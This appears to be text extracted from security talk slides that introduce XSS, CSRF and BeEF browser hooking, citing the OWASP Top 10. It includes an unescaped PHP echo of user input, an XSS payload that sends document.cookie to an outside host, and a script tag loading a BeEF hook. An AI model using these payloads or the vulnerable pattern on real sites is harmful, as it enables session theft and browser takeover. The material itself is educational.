So just how bad is the bad stuff the bad people do? 37
38OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest websecurity weaknesses.Known as the OWASP Top 10 it’s a great resource..www.owasp.org
Cross Site Scripting (XSS) 39In the OWASP Top 10 this comes in at number 2, and they describe it as so:“XSS ﬂaws occur when an application includes user supplied data in a page sent to thebrowser without properly validating or escaping that content”
Server code:1. Take ‘greeting’ parameterpage.php?greeting=<input>2. Dynamically print that out in the response<p><?php echo $_GET[‘greeting’] ?></p> 40
What if greeting was:<script>img=new Image();img.src=http://frichot.com/nom.php?cookie=+document.cookie;</script> 41
Cross Site Request Forgery (CSRF) 45CSRF comes in at number 5 in the OWASP Top 10.. described as:“Since browsers send credentials like session cookies automatically, attackers can createmalicious web pages which generate forged requests that are indistinguishable fromlegitimate ones.”
Hooking Browsers• XSS• Social Engineering (i.e. tiny URL, or phishing via email)• Embedding the payload (think drive-by- download)• Maintaining persistence after already being hooked (think Tab BeEF Injection) 67
<script src="http://beefserver.com/hook.js"></script> 68This is pretty much all you need.